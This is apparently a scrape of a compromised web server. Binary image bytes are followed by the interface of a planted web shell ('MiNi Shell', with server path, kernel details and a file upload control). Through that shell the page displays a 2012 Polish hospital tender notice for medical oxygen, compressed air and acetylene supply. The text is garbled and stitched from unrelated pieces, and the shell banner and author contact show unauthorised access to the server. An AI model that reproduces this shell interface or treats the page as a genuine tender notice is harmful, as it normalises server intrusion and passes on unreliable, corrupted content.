JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/249265-N-2012.html

<p class="kh_header"><b>Wieluń: Zakup z dostawą  ciekłego  i  sprężonego  tlenu  medycznego  oraz  sprężonego  powietrza  i acetylenu  wraz  z  dzierżawą  zbiornika  i  butli  na  te  gazy</b><br>
<b>Numer ogłoszenia: 249265 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu , ul. Szpitalna 16, 98-300 Wieluń, woj. łódzkie, tel. +48 043 8438311 w. 355, faks 043 843 83 11 wew. 213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.powiat.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup z dostawą  ciekłego  i  sprężonego  tlenu  medycznego  oraz  sprężonego  powietrza  i acetylenu  wraz  z  dzierżawą  zbiornika  i  butli  na  te  gazy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  zamówienia  jest  sukcesywna dostawa  do  Szpitala  w  Wieluniu  następujących  gazów :
a)  tlenu  medycznego  ciekłego  w  ilości  225.000 kg  wraz  z  dzierżawą  zbiornika  do  jego  magazynowania  o  pojemności  4500 - 7000  litrów
b) tlenu  medycznego  sprężonego  w  butlach  o  pojemności   6,4 m 3  oraz  1,6 m 3  w  ilości  3000 m3    wraz  z  dzierżawą  tych  butli  ( 70 szt. )  
c) powietrza  sprężonego   w  butlach  o  pojemności   6,0 m 3    w  ilości  300 m3   wraz  z  dzierżawą  tych  butli  ( 10 szt.)					
d) acetylenu  w  butlach  o  pojemności 6 kg  w  ilości  30 kg  wraz z dzierżawą  butli ( 1 szt. )
2. Zamawiający  wymaga, aby dostarczany  tlen medyczny spełniał wymagania monografii farmakopei europejskiej oraz posiadał wszystkie obowiązujące prawem dokumenty dopuszczające go do obrotu i stosowania jako produkt leczniczy w rozumieniu ustawy z dnia 6 września 2001 r. Prawo Farmaceutyczne.
3.  Zamawiający  oczekuje  oddania  w  dzierżawę  zbiornika  o  pojemności  od  4500 do  5000   litrów , gdyż  średnie  miesięczne  zapotrzebowanie  Szpitala  na  tlen  medyczny  ciekły  wynosi  około  5000  kg.  Wykonawca  może  zaproponować  oddanie  w  dzierżawę  zbiornika  większego  (do  7000  litrów ),  lecz  musi  liczyć  się  z  obliczeniową   wytrzymałością  istniejącego  już  fundamentu. W  takim  przypadku  wskazane  byłoby  przeprowadzić  wizję  lokalną  na  terenie  istniejącej  tlenowni, czy  oferowany  zbiornik może  być  zainstalowany  w  przeznaczonym  do  tego  miejscu. 				
4.  Zbiornik  do  magazynowania  tlenu  ciekłego  zlokalizowany  będzie  na  zapleczu Szpitala  obok  rozdzielni  tlenu, na  istniejącym  już  fundamencie  z  betonu  B 150 o   wymiarach  250 cm x 250 cm  oraz  głębokości  180 cm i  mocowany  na 4 śruby  M 24 . Na  powierzchni  23,30 m2, ograniczonej  istniejącym  już  ogrodzeniem  musi    stanąć  zbiornik  na  tlen  ciekły  oraz niezbędne  do  jego  prawidłowego  funkcjonowania   urządzenia. Istniejący  stan obiektów  obrazuje  rysunek  stanowiący  Załącznik do SIWZ.                    
5.  Zamawiający  oczekuje  od  Wykonawcy :   
a)  uzyskania dopuszczenia UDT do eksploatacji zbiornika,
b) przeglądów zbiornika oraz instalacji pomocniczej, zgodnie z obowiązującymi przepisami, których koszt  zawarty jest w cenie czynszu dzierżawnego,
c)  przeszkolenia pracowników Zamawiającego w użytkowaniu zbiornika na ciekłe gazy  oraz jego instalacji,
d)  zagwarantowania właściwego stanu technicznego zbiornika przez cały okres eksploatacji przez Zamawiającego, 								                    
e) stosownych legalizacji na butle do przechowywania gazów.				
6.  Koszt  naprawy  wszelkich  awarii  zbiornika  oraz  jego   urządzeń  pomocniczych wykonywane  przez  cały  czas  związania  się  umową,   ma  być  zawarty  w cenie czynszu dzierżawnego.  Czas  oczekiwania  na  usunięcie  awarii  nie  może  przekraczać  48  godzin  od  chwili  jej zgłoszenia.						
7.  Zamawiający  oczekuje  ciągłej  dostawy  tlenu  medycznego  sprężonego  i  ciekłego na  każdorazowe  zlecenie  telefoniczne  transportem  wykonawcy, którego  koszty należy  wliczyć  do  ceny  za  ww.  gazy .  Czas  od  chwili  zlecenia  telefonicznego  do chwili  dostawy  na  miejsce  nie  może  przekraczać  72 godz.	
8.  W  razie  podpisania  umowy  Wykonawca  wykonuje  wszystkie  roboty  i  ponosi  całość  nakładów  finansowych  związanych  z  montażem  nowego  zbiornika  oraz  wykonaniem    niezbędnej  do  jego  funkcjonowania  instalacji. Termin  dostarczenia  i  zamontowania zbiornika  do  magazynowania  ciekłego  tlenu  medycznego  oraz  dostosowanie  jego instalacji  do  funkcjonującej  już  w  Szpitalu  instalacji  wynosi  14 dni  od  daty  podpisania  umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 24.11.15.00-5, 24.11.19.00-1, 24.11.32.00-1, 24.32.11.15-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: posiadania uprawnień do wykonywania określonej działalności lub czynności,  jeżeli przepisy prawa nakładają obowiązek ich posiadania
 - posiadają zezwolenie na wytwarzanie produktu leczniczego - tlenu medycznego, jeżeli Wykonawca jest wytwórcą  oraz  zezwolenie na  prowadzenie obrotu produktem leczniczym - tlenem medycznym, jeżeli Wykonawca jest  dystrybutorem.
Zamawiający uzna, iż Wykonawca spełnia warunek posiadania uprawnień do   
wykonywania działalności gospodarczej będącej przedmiotem niniejszego zamówienia  
po złożeniu przez Wykonawcę  wraz z ofertą aktualnego zezwolenia na wytwarzanie produktu leczniczego - tlenu medycznego, jeżeli Wykonawca jest wytwórcą  oraz aktualnego zezwolenia  na prowadzenie obrotu produktami farmaceutycznymi - tlenem medycznym, jeżeli Wykonawca jest dystrybutorem i posiada podpisaną umowę z wytwórcą posiadającym zezwolenie na wytwarzanie na termin minimum 36 miesięcy od daty złożenia oferty  oraz aktualnego odpisu z właściwego rejestru KRS  lub  Rejestru Centralnej Ewidencji i  Informacji o  Działalności Gospodarczej Rzeczypospolitej Polskiej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Ocena  metodą  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: posiadający wiedzę i doświadczenie. 
Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i      doświadczenia  na podstawie oświadczenia złożonego przez Wykonawcę  wraz z ofertą, zgodnie z  Załącznikiem do SIWZ.
Ocena  metodą  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: dysponujący odpowiednim potencjałem technicznym.
Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i      doświadczenia  na podstawie oświadczenia złożonego przez Wykonawcę  wraz z ofertą, zgodnie z  Załącznikiem do SIWZ.
Ocena  metodą  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: dysponujący osobami zdolnymi do wykonania zamówienia.
Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i      doświadczenia  na podstawie oświadczenia złożonego przez Wykonawcę  wraz z ofertą, zgodnie z  Załącznikiem do SIWZ.
Ocena  metodą  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:  sytuacji ekonomicznej i finansowej -  są  ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 1.000 000 PLN ( słownie : jeden milion PLN ).
Zamawiający uzna, iż Wykonawca spełnia warunek odpowiedniej sytuacji 
ekonomicznej i finansowej  niezbędnej do realizacji niniejszego zamówienia - po złożeniu przez Wykonawcę  wraz z ofertą  opłaconej  polisy, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (jeśli dowód opłacenia składki nie wynika z ww. dokumentu należy go również załączyć do oferty). W przypadku wskazania przez Wykonawców kwot w walucie innej niż złoty polski  (PLN), do przeliczenia na PLN wszystkich wartości i danych finansowych podanych w innych walutach,  Zamawiający zastosuje średni kurs Narodowego Banku Polskiego aktualny na dzień publikacji ogłoszenia o zamówienia.
Ocena  metodą  spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualne pozwolenia dopuszczające do obrotu i stosowania oferowany produkt            leczniczy - tlen medyczny ( tzw. świadectwo rejestracji  lub inne  dokumenty zgodne z  ustawą z dnia 6 września 2001 r. Prawo Farmaceutyczne )</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.powiat.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu 98-300 Wieluń, ul. Szpitalna 16 Dział Obsługi i ZP, pokój nr 205.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2012 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu 98-300 Wieluń, ul. Szpitalna 16 Sekretariat, pokój nr 216.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com